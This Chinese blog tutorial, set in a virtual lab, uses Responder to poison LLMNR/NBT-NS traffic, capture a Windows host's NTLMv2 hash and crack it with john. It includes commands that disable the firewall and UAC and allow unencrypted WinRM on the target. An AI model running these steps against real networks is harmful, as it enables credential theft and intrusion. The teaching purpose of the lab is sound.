内网渗透-Responder捕获Win哈希

最新推荐文章于 2023-09-20 00:13:26 发布
最新推荐文章于 2023-09-20 00:13:26 发布
阅读量3k 收藏 6
点赞数 4
分类专栏: 内网渗透 文章标签: 安全 内网渗透
本文链接:https://blog.csdn.net/weixin_43221560/article/details/107757138
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

Responder捕获Win哈希

实验环境

VM搭建的虚拟测试环境
1.被攻击win7主机192.168.1.130
2.kali 192.168.1.131
3.win7配置

netsh advfirewall set allprofiles state off
winrm quickconfig
winrm set winrm/config/service/auth @{Basic="true"}
winrm set winrm/config/service @{AllowUnencrypted="true"}
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
重启

Responder

responder 这个工具会回答发出的LLMNR和NBT-NS查询,诱使受害者主机提供Net-NTLM哈希。
该工具一般只针对SMB的文件服务器服务请求

安装Responder

Responder在kali中已经内置,但版本更新可能不及时,最好自己进行下载更新
先配置好生成工具等环境

apt-get install build-essential git python-dev

从github下载源码

git clone https://github.com/lagandx/Responder.git
cd Resopnder/
git pull

Responder参数

Resopnder有很多参数
-I 设置监听的网络接口,eth0
-f 收集NBT_NS或LLMNR的信息
-w 设置WPAD服务器

获取NTLMv2哈希

1.开始毒化,监听请求信息

./Responder.py -wfF -I eth0

在这里插入图片描述
此时kali已经毒化完成,并监听信息。
2.使用被攻击主机随意访问域内共享文件,或访问域内主机
在这里插入图片描述

时已经获取到了被攻击主机的哈希值
3.CTRL+C进行结束进程,使用./DumpHash.py导出捕获的哈希值

./DumpHash.py

在这里插入图片描述
此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt。
4.破解hash密码
使用Hashcat或者john等密码破解工具进行破解

john DumpNTLMv2.txt

在这里插入图片描述
破解出用户名hacker,密码password1

XG小刚
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透之Responder攻防(上)1
08-08
渗透之Responder攻防(上)1
Laravel开发-laravel-responder
08-27
**Laravel 开发与 Laravel Responder** 在 Laravel 开发中,构建高质量的 API 是一个重要的环节,这通常涉及到数据的格式化、响应处理以及错误管理等。`laravel-responder` 是一个专为 Laravel 设计的包,它将 ...
渗透师指南之Responder
热门推荐
大方子
06-30 1万+
总结与思考: 1. 利用Responder进行NTLMV2哈的窃取 2. 使用Responder进行中继,攻击成功后进行代码执行 3. 使用Responder进行凭证/哈破解 4. 使用Responder进行快速SMB扫描 5. 使用Responder配合MSF反弹shell 6. LLMNR/NBT-NS攻击的防御 概述: Responder是对渗透测试工作者来说一个很棒的工...
渗透之Responder演练(下)
xnxqwzy的博客
08-23 136
NTLM中继攻击已经被发现十多年了,要实现NTLM中继攻击,也需要先进行LLMNR/NBNS欺骗,这样,攻击机器就可以充当了中间人,本质上还是由于NTLM认证机制所导致的,且对于最新的NTLMv2认证任然有效,但这个过程并不是没有限制,对于工作组的机器来说,两台机器的密码需要一致才能成功,对于域用户来说,被欺骗用户(发起请求的用户)需要域管理员组里边的用户才可以,NTLM中继成功后的权限为被欺骗用户的权限。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。
渗透测试靶场练习——Responder
Aibne_的博客
06-13 285
渗透测试靶场练习——Responder
Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder
Start C的博客
04-19 1166
涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器) 先看一下旁边的Walkthough,看看本靶场的要求 本实验重点介绍如何利用 Windows 机器上提供的页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程
ssdp-responder:适用于Linux的SSDP响应器,Windows中的InternetGatewayDevice图标
05-25
适用于Linux / UNIX的SSDP响应器 用于联Linux和UNIX设备的简单服务发现协议守护程序(SSDP)。 在任何大小的设置中都有用,但更多地针对需要向Windows系统宣布自己的嵌入式系统。 ssdpd是一个独立的UNIX守护程序,...
uMTP-Responder:用于GNULinux的轻量级USB媒体传输协议(MTP)响应程序守护程序
02-05
**uMTP-Responder简介** uMTP-Responder是一个针对GNULinux操作系统的轻量级USB媒体传输协议(MTP)响应程序守护进程。它的主要目的是实现与MTP设备(如智能手机、数码相机等)之间的文件传输。MTP是微软推出的一种...
使用Responder获取ntlmv2 hash
whojoe的博客
03-03 1329
使用Responder获取ntlmv2 hashResponder配置下载获取ntlmv2hash之后进行爆破获取ntlmv2使用hashcat爆破密码中继获得shell参考文章 Responder配置 下载 https://github.com/lgandx/Responder Responder工具可以污染LLMNR和NBT-NS请求。 在目录下的Responder.conf可以配置启用的模块 如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解 如果要使用ntlm中
不利用系统漏洞拿shell,kali强大工具Responder
qq_39815966的博客
10-17 1708
这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。 我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可, 当然首先你先需要安装一下python环境和git工具 # apt-get intall build-essential git python-dev 然后是直接从git
灰帽黑客(第五版):实验10-1 使用Responder获取口令
lmpwang的博客
08-25 241
宿主机Kali:192.168.43.209虚拟机VirtualBox:络:桥接络,使虚拟机和宿主机保持在一个段系统:win10家庭版系统(初始系统使用virtualbox安装过程默认密码changeme!Responder。
Windows 环境中使用 Responder 窃取 NTLMv2 哈并利用
子曰小玖的博客
04-24 879
Responder工具 Responder下载地址:https://github.com/lgandx/Responder Responder工具可以污染LLMNR和NBT-NS请求。 首先假设连接到Windows活动目录环境(Windows Active directory),当络上的设备尝试用LLMNR和NBT-NS请求来解析目的地机器时,Responder就会伪装成目的地机器。当受害...
responder简单用法
qq_44881113的博客
09-08 1380
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix Responder 是一款可以在局域模拟各种服务器的内渗透神器 其可以在局域中进行 DNS 欺骗、LLMNR 欺骗等,实现对用户 NTLM 口令的探测以及 DNS 钓鱼 同时其还可以模拟包括 FTP、HTTP 在内的多
Responder
最新发布
09-20 434
操作系统:Kali Linux 工具:responder,john,evil-winrm PS:输入以下命令解决靶场环境无法打开问题
最新kali之responder
vanony的博客
07-09 693
选项: --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -A, --analyze 分析模式。 此选项使您无需响应即可查看NBT-NS,BROWSER,LLMNR请求。 -I eth0, --interface=eth0 要使用的络接口,可以将“ ALL”用作所有接口的通配符 -i 10.0.0.21, --ip=10.0.0.21 要使用的本地IP(仅适用于OSX) -e 10.0.0.22, --externalip=10.0.0.22 使
KALI 2020 软件集成清单——嗅探/欺骗(九)
weixin_44024324的博客
04-29 1054
9、嗅探/欺骗 9.1络欺骗 9.1.1 dnschef 是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析 9.1.2 rebind 可以实现对用户所在络路由器进行攻击。当用户访问Rebind监听域名,Rebind会自动实施DNS Rebinding攻击,通过用户的浏览器执行js脚本,建立socket连接 9.1.3 sslsplit 作为mid man监听ssl信息及HTTP信息。h...
Kali 玩机技巧(杂篇)
辉小鱼的博客
11-03 2014
本文是有关Kali Linux系统的一些简单低级的用法演示,是我个人听课笔记的总结,望能解决大家的一些问题与困惑!该博文仅限技术学习与交流,若由此发生的一切攻击不法行为,皆与本人无关!
rust Responder和ResponseError的使用
07-17
在Rust的actix-web框架中,`Responder`和`ResponseError`是用于处理HTTP响应的重要trait。它们允许你定义如何将数据转换为HTTP响应以及如何处理错误。 `Responder` trait用于将数据转换为HTTP响应。你可以在自定义的类型上实现`Responder` trait,以便该类型可以直接返回给actix-web的处理器函数。以下是一个示例: ```rust use actix_web::{HttpResponse, Responder}; struct MyData { // 数据结构 } impl Responder for MyData { type Error = actix_web::Error; type Future = Result<HttpResponse, Self::Error>; fn respond_to(self, _: &actix_web::HttpRequest) -> Self::Future { // 将数据转换为HttpResponse let response = HttpResponse::Ok().json(self); // 假设MyData实现了serde的Serialize trait Ok(response) } } ``` 在这个示例中,我们为自定义的`MyData`类型实现了`Responder` trait。我们通过实现`respond_to`方法来定义如何将数据转换为HTTP响应。在这个例子中,我们使用`HttpResponse::Ok().json(self)`将`MyData`转换为JSON格式的HTTP响应。 `ResponseError` trait用于处理错误并生成适当的HTTP响应。你可以在自定义的错误类型上实现`ResponseError` trait,以便actix-web可以捕获并处理这些错误。以下是一个示例: ```rust use actix_web::{HttpResponse, ResponseError}; use std::convert::From; #[derive(Debug)] struct MyError { // 错误信息 } impl ResponseError for MyError { fn error_response(&self) -> HttpResponse { // 生成适当的HTTP响应 HttpResponse::InternalServerError().body("Internal Server Error") } } impl From<actix_web::Error> for MyError { fn from(_: actix_web::Error) -> Self { MyError { // 从actix-web的Error转换为自定义的错误类型 } } } ``` 在这个示例中,我们为自定义的`MyError`类型实现了`ResponseError` trait。我们通过实现`error_response`方法来定义如何生成适当的HTTP响应。在这个例子中,我们直接返回一个带有"Internal Server Error"消息的500错误响应。 另外,我们还实现了`From<actix_web::Error>` trait,以便将actix-web的错误转换为我们自定义的错误类型。这样,在处理请求时,actix-web可以自动将错误转换为我们定义的`MyError`类型。 望这可以帮助你理解和使用`Responder`和`ResponseError` trait!如果还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值